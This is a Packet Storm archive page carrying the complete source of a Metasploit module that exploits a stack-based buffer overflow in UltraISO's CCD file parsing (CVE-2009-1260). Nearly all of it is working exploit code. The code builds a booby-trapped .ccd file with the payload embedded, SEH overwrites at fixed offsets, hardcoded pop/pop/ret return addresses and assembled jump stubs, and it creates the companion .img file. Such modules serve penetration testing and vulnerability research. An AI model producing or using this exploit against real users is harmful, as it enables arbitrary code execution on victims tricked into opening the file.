exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

UltraISO CCD File Parsing Buffer Overflow

UltraISO CCD File Parsing Buffer Overflow
Posted Mar 25, 2010
Authored by jduck | Site metasploit.com

This Metasploit module exploits a stack-based buffer overflow in EZB Systems, Inc's UltraISO. When processing .CCD files, data is read from file into a fixed-size stack buffer. Since no bounds checking is done, a buffer overflow can occur. Attackers can execute arbitrary code by convincing their victim to open an CCD file. NOTE: A file with the same base name, but the extension of "img" must also exist. Opening either file will trigger the vulnerability, but the files must both exist.

tags | exploit, overflow, arbitrary
advisories | CVE-2009-1260
SHA-256 | 30e02aa6984aacb11b71fa29122741f9292b8c26198078a7f112e2fb44fa522c

UltraISO CCD File Parsing Buffer Overflow

Change Mirror Download
##
# $Id: ultraiso_ccd.rb 8900 2010-03-24 19:35:29Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# https://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
Rank = GreatRanking

include Msf::Exploit::FILEFORMAT
include Msf::Exploit::Remote::Seh

def initialize(info = {})
super(update_info(info,
'Name' => 'UltraISO CCD File Parsing Buffer Overflow',
'Description' => %q{
This module exploits a stack-based buffer overflow in EZB Systems, Inc's
UltraISO. When processing .CCD files, data is read from file into a
fixed-size stack buffer. Since no bounds checking is done, a buffer overflow
can occur. Attackers can execute arbitrary code by convincing their victim
to open an CCD file.

NOTE: A file with the same base name, but the extension of "img" must also
exist. Opening either file will trigger the vulnerability, but the files must
both exist.
},
'License' => MSF_LICENSE,
'Author' => [ 'jduck' ],
'Version' => '$Revision: 8900 $',
'References' =>
[
[ 'CVE', '2009-1260' ],
[ 'OSVDB', '53275' ],
[ 'BID', '34363' ],
# NOTE: The following BID is a duplicate of BID 34363
[ 'BID', '38613' ],
# NOTE: The following OSVDB entry seems invalid, the IMG file doesn't appear to trigger any vulnerability.
# [ 'OS-VDB', '53425' ],
[ 'URL', 'https://www.exploit-db.com/exploits/8343' ]
],
'Payload' =>
{
'Space' => 2048,
'BadChars' => "\x00\x08\x0a\x0d\x20",
'DisableNops' => true,
},
'Platform' => 'win',
'Targets' =>
[
# Tested OK on:
# v9.3.3.2685
# v9.3.6.2750

# The EXE base addr contains a bad char (nul). This prevents us from
# using the super-elite multi-offset SEH exploitation method.

[ 'Windows Universal - Double-Click/Command Line Open Method',
{
'Offset' => 4094,
# NOTE: lame_enc.dll isn't loaded when opening via double-click / cmd line.
#'Ret' => 0x10011640 # p/p/r in lame_enc.dll
# To make matters even worse, we can't use system dlls due to Safe SEH!
#'Ret' => 0x71b26b7e # p/p/r in mpr.dll
'Ret' => 0x00403856 # p/p/r in unpacked UltraISO.exe (from public exploit)
}
],
[ 'Windows Universal - File->Open + Toolbar Open Methods',
{
'Offset' => [ 5066, 5158 ],
'Ret' => 0x10011640 # p/p/r in lame_enc.dll
}
],
],
'Privileged' => false,
'DisclosureDate' => 'Apr 03 2009',
'DefaultTarget' => 0))

register_options(
[
OptString.new('FILENAME', [ true, 'The file name.', 'msf.ccd']),
], self.class)
end

def exploit

print_status("Creating '#{datastore['FILENAME']}' using target '#{target.name}' ...")

sploit = "[CloneCD]\r\n"
sploit << "Version=3\r\n"

sploit << "[Disc]\r\n"
sploit << "TocEntries=4\r\n"
sploit << "Sessions=1\r\n"
sploit << "DataTracksScrambled=0\r\n"
sploit << "CDTextLength=0\r\n"

sploit << "[Session 1]\r\n"
sploit << "PreGapMode=1\r\n"
sploit << "PreGapSubC=0\r\n"
sploit << "[Entry 0]\r\n"
sploit << "Session=1\r\n"
sploit << "Point=0xa0\r\n"
sploit << "ADR=0x01\r\n"
sploit << "Control=0x04\r\n"
sploit << "TrackNo=0\r\n"
sploit << "AMin=0\r\n"
sploit << "ASec=0\r\n"
sploit << "AFrame=0\r\n"
sploit << "ALBA=-150\r\n"
sploit << "Zero=0\r\n"
sploit << "PMin=1\r\n"
sploit << "PSec=0\r\n"
sploit << "PFrame=0\r\n"
sploit << "PLBA=4350\r\n"

sploit << "[Entry 1]\r\n"
sploit << "Session=1\r\n"
sploit << "Point=0xa1\r\n"
sploit << "ADR=0x01\r\n"
sploit << "Control=0x04\r\n"
sploit << "TrackNo=0\r\n"
sploit << "AMin=0\r\n"
sploit << "ASec=0\r\n"
sploit << "AFrame=0\r\n"
sploit << "ALBA=-150\r\n"
sploit << "Zero=0\r\n"
sploit << "PMin=1\r\n"
sploit << "PSec=0\r\n"
sploit << "PFrame=0\r\n"
sploit << "PLBA=4350\r\n"

sploit << "[Entry 2]\r\n"
sploit << "Session=1\r\n"
sploit << "Point=0xa2\r\n"
sploit << "ADR=0x01\r\n"
sploit << "Control=0x04\r\n"
sploit << "TrackNo=0\r\n"
sploit << "AMin=0\r\n"
sploit << "ASec=0\r\n"
sploit << "AFrame=0\r\n"
sploit << "ALBA=-150\r\n"
sploit << "Zero=0\r\n"
sploit << "PMin=0\r\n"
sploit << "PSec=2\r\n"
sploit << "PFrame=34\r\n"
sploit << "PLBA=34\r\n"

sploit << "[Entry 3]\r\n"
sploit << "Session=1\r\n"
sploit << "Point=0x01\r\n"
sploit << "ADR=0x01\r\n"
sploit << "Control=0x04\r\n"
sploit << "TrackNo=0\r\n"
sploit << "AMin=0\r\n"
sploit << "ASec=0\r\n"
sploit << "AFrame=0\r\n"
sploit << "ALBA=-150\r\n"
sploit << "Zero=0\r\n"
sploit << "PMin=0\r\n"
sploit << "PSec=2\r\n"
sploit << "PFrame=0\r\n"
sploit << "PLBA=0\r\n"

sploit << "[TRACK 1]\r\n"
sploit << "MODE=1\r\n"
sploit << "INDEX 1="

idx_line = ''
idx_line << rand_text_alphanumeric(1000) * 9

# Stick the payload at the beginning
idx_line[0,payload.encoded.length] = payload.encoded

# If we have an array of offets, handle it specially
seh_offset = target['Offset']
if (seh_offset.is_a?(::Array))
# Multiple offets that can be used simultaneously
seh_offset.each { |off|
seh = generate_seh_record(target.ret)
distance = off + seh.length
jmp = Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-" + distance.to_s).encode_string

idx_line[off, seh.length] = seh
idx_line[off+seh.length, jmp.length] = jmp
}
else
off = seh_offset
# We'll manually construct this double-backward jumping SEH handler frame
distance = off - 5
jmp1 = Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-" + distance.to_s).encode_string
distance = jmp1.length
jmp2 = Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-" + distance.to_s).encode_string
seh = ''
seh << jmp2
seh << rand_text(2)
seh << [target.ret].pack('V')
# we can't put anything below the return address due to a potential nul byte in it

# Add the double-back-jumping SEH frame
idx_line[off-5, jmp1.length] = jmp1
idx_line[off,seh.length] = seh
end

sploit << idx_line

file_create(sploit)

# create the empty IMG file
imgfn = datastore['FILENAME'].dup
imgfn.gsub!(/\.ccd$/, '.img')
out = File.expand_path(File.join(datastore['OUTPUTPATH'], imgfn))
File.new(out,"wb").close
print_status("Created empty output file #{out}")

end

end
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    0 Files
  • 13
    Nov 13th
    0 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close